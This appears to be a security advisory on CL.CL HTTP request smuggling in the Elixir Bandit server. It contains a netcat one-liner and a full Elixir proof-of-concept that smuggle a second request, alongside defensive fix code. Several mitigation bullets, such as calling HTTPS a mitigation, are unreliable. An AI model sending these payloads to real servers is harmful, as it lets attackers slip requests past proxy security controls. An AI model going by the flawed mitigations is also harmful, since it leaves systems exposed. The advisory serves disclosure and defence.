Bandit, HTTP Request Smuggling (CLCL), No CVE (Medium)


How the vulnerability works:

Bandit’s `Bandit.Headers.get_content_length/1` calls `List.keyfind/3`, which returns only the first `Content-Length` header value when several header lines are present. RFC 9112 §6.3 item 5 mandates that duplicate `Content-Length` headers with differing values be treated as an unrecoverable framing error, to be answered with a 400 response. Bandit instead silently accepts two `Content-Length` headers with differing values and uses the first one for the body length; the second header line is ignored and its value is never validated.

Because the first header says the body is empty, the bytes described by the second header are not consumed as part of the first request. After Bandit has processed the first request (with a zero-length body), it reads the leftover data from the TCP buffer as a separate pipelined request. A malicious client sends `Content-Length: 0` followed by `Content-Length: 43` and a 43-byte payload containing a smuggled `GET /smuggled HTTP/1.1` request line. Bandit replies to the first POST, then treats the smuggled line as a second request on the same keep-alive connection.

This bypasses any frontend proxy that uses the last `Content-Length` value (CL-last behavior) and forwards both headers unchanged: the proxy applies its security controls (WAF, ACLs, rate limiting) to the first request only, and the smuggled request never traverses those controls. The vulnerability was introduced before v0.1.0 (Nov 5, 2020) via commit e5270b1 on Nov 16, 2019. The fix requires collecting all `Content-Length` values, parsing them, and rejecting the request unless all values are byte-identical. Bandit already rejects the comma-separated form (`Content-Length: 0, 43`) correctly; the bug applies only to multi-line duplicate headers.
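The following is an added example, not Bandit’s code or the project’s patch: a hardened replacement for the `get_content_length/1` shape quoted on this page, written to the rule the paragraph above describes (collect every `Content-Length` field line, split comma-separated lists, accept only when all members are byte-identical and parse as a plain decimal integer, otherwise report a framing error so the caller can answer 400 and close the connection). The module name, the `{:ok, _} | {:error, :invalid_content_length}` return shape and the sample header lists are assumptions chosen for illustration.

```elixir
# Added example (not Bandit's code): RFC 9112 §6.3-style Content-Length framing.
defmodule HardenedHeaders do
  @type headers :: [{String.t(), String.t()}]

  @spec get_content_length(headers) ::
          {:ok, non_neg_integer | nil} | {:error, :invalid_content_length}
  def get_content_length(headers) do
    # Collect every member of every Content-Length field line, so a second
    # header line cannot be silently ignored the way List.keyfind/3 ignores it.
    values =
      for {name, value} <- headers,
          String.downcase(name) == "content-length",
          member <- String.split(value, ","),
          do: String.trim(member)

    case values do
      [] ->
        {:ok, nil}

      [first | _] ->
        # All members must be the same exact byte string AND a valid integer;
        # anything else is an unrecoverable framing error for the caller.
        if Enum.all?(values, &(&1 == first)) and valid_length?(first) do
          {:ok, String.to_integer(first)}
        else
          {:error, :invalid_content_length}
        end
    end
  end

  # RFC 9110 §8.6: Content-Length = 1*DIGIT. Rejects signs, spaces, hex, empty.
  defp valid_length?(value), do: Regex.match?(~r/\A[0-9]+\z/, value)
end

# Constructed header lists covering the cases discussed on this page; each
# line is a pattern-match assertion, so a mismatch raises immediately.
{:ok, 43} = HardenedHeaders.get_content_length([{"host", "127.0.0.1"}, {"content-length", "43"}])
# The CL.CL case from the PoC: two lines, differing values.
{:error, :invalid_content_length} =
  HardenedHeaders.get_content_length([{"content-length", "0"}, {"content-length", "43"}])
# The comma-separated form Bandit already rejects is rejected here too.
{:error, :invalid_content_length} = HardenedHeaders.get_content_length([{"content-length", "0, 43"}])
# Identical duplicates are permitted by the RFC.
{:ok, 43} = HardenedHeaders.get_content_length([{"content-length", "43"}, {"content-length", "43"}])
# No Content-Length at all.
{:ok, nil} = HardenedHeaders.get_content_length([{"host", "x"}])
# A sign is not 1*DIGIT.
{:error, :invalid_content_length} = HardenedHeaders.get_content_length([{"content-length", "+43"}])
IO.puts("all framing checks passed")
```

Run with `elixir hardened_headers.exs`; a caller that receives `{:error, :invalid_content_length}` should send 400 and close the socket rather than continue reading, since the leftover bytes are exactly what a smuggling attempt relies on being parsed as a new request.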

dailycve form:

Platform: Elixir Bandit
Version: 1.10.4 / earlier
Vulnerability: CL.CL smuggling
Severity: Medium
Date: 2026-04-28

Prediction: Patch expected May 15 2026

Analytics under What Undercode Say:

Test with netcat (raw HTTP):

  printf "POST / HTTP/1.1\r\nHost: 127.0.0.1\r\nContent-Length: 0\r\nContent-Length: 43\r\n\r\nGET /smuggled HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n" | nc 127.0.0.1 4321

Vulnerable function location: lib/bandit/headers.ex

  def get_content_length(headers) do
    # List.keyfind/3 returns only the first matching tuple, so a second
    # Content-Length line is never examined.
    case List.keyfind(headers, "content-length", 0) do
      {_, value} -> parse_content_length(value)
      nil -> nil
    end
  end

How to exploit:

Full PoC script (save as smuggle.exs and run with `elixir smuggle.exs`):

  Mix.install([{:bandit, "~> 1.10"}, {:plug, "~> 1.19"}])

  # Minimal upstream app: echoes the method and path it saw, so a smuggled
  # request shows up as a second "method=GET path=/smuggled" line.
  defmodule DemoApp do
    @behaviour Plug
    def init(opts), do: opts

    def call(conn, _opts) do
      Plug.Conn.send_resp(conn, 200, "method=#{conn.method} path=#{conn.request_path}\n")
    end
  end

  defmodule Smuggle do
    @port 4321

    def run do
      {:ok, _} = Bandit.start_link(plug: DemoApp, ip: {127, 0, 0, 1}, port: @port)

      # First header claims a 0-byte body, second claims 43 bytes; the 43 bytes
      # that follow are a complete GET request line plus headers.
      req =
        "POST / HTTP/1.1\r\nHost: 127.0.0.1\r\nContent-Length: 0\r\nContent-Length: 43\r\n\r\n" <>
          "GET /smuggled HTTP/1.1\r\nHost: 127.0.0.1\r\n\r\n"

      {:ok, sock} = :gen_tcp.connect(~c"127.0.0.1", @port, [:binary, active: false])
      :ok = :gen_tcp.send(sock, req)

      # Read whatever arrives within 2 s; a vulnerable server answers both the
      # POST and the smuggled GET on the same connection.
      {:ok, response} = :gen_tcp.recv(sock, 0, 2000)
      IO.puts(response)
      :gen_tcp.close(sock)
    end
  end

  Smuggle.run()

Protection from this vulnerability:

  • Upgrade Bandit to the patched version (when available).
  • Configure the frontend proxy to reject duplicate `Content-Length` headers (e.g., `proxy_set_header Content-Length ""` in nginx, or enable strict parsing).
  • Deploy Bandit directly on the internet rather than behind a permissive frontend; the smuggled request only slips past controls when a CL-last proxy sits in front of it.
  • Use HTTP/2 or HTTPS to mitigate request smuggling (pipelining disabled).
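For deployments that cannot upgrade yet, here is an added example of a compensating control at the Plug layer; it is not Bandit’s or Plug’s own code. It does not repair Bandit’s framing (by the time a Plug runs, the server has already chosen the first `Content-Length`), but it refuses to serve any request that carried conflicting values and asks the server to close the connection, so the leftover bytes are never parsed as a second request. The module name is an assumption, as is the premise that the server honours a `connection: close` response header, which should be verified against the Bandit version in use. The self-check uses `Plug.Test` with constructed header lists and needs no network.

```elixir
# Added example (not Bandit's or Plug's code): reject conflicting Content-Length
# values before the application sees the request.
Mix.install([{:plug, "~> 1.19"}])

defmodule RejectConflictingContentLength do
  @behaviour Plug
  import Plug.Conn

  @impl true
  def init(opts), do: opts

  @impl true
  def call(conn, _opts) do
    # Bandit lower-cases header names, so one lookup returns every field line.
    distinct =
      conn
      |> get_req_header("content-length")
      |> Enum.flat_map(&String.split(&1, ","))
      |> Enum.map(&String.trim/1)
      |> Enum.uniq()

    case distinct do
      # Two or more different values: RFC 9112 §6.3 treats this as unrecoverable.
      # Assumption: the server honours "connection: close" and drops the socket,
      # discarding any unread bytes instead of parsing them as a new request.
      [_, _ | _] ->
        conn
        |> put_resp_header("connection", "close")
        |> send_resp(400, "Bad Request: conflicting Content-Length")
        |> halt()

      _ ->
        conn
    end
  end
end

# Constructed requests checked with Plug.Test; pattern matches act as assertions.
conflicting =
  %{
    Plug.Test.conn("POST", "/")
    | req_headers: [{"host", "127.0.0.1"}, {"content-length", "0"}, {"content-length", "43"}]
  }
  |> RejectConflictingContentLength.call([])

true = conflicting.halted
400 = conflicting.status
["close"] = Plug.Conn.get_resp_header(conflicting, "connection")

# Identical duplicates are allowed by the RFC and pass through untouched.
benign =
  %{Plug.Test.conn("POST", "/") | req_headers: [{"content-length", "43"}, {"content-length", "43"}]}
  |> RejectConflictingContentLength.call([])

false = benign.halted
nil = benign.status

IO.puts("guard behaves as expected")
```

Place the plug first in the pipeline (before routing, parsers and authentication) so the 400 is returned before any application logic or logging runs on the mis-framed request; in a `Plug.Builder` module that is simply `plug RejectConflictingContentLength` ahead of the other `plug` lines.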

Impact:

Spec violation enabling request smuggling when Bandit sits behind a CL-last proxy. An attacker can bypass the edge WAF, path-based ACLs, rate limiting, and audit logging. It does not bypass application authentication (the Plug pipeline still runs). Realistic data exfiltration is possible through response-queue desync on pooled upstream connections. Major CDNs (Cloudflare, AWS ALB, modern nginx, HAProxy default) reject CL.CL and are not vulnerable; custom/legacy proxies are at risk.


Sources:

Reported By: github.com
Extra Source Hub:
Undercode
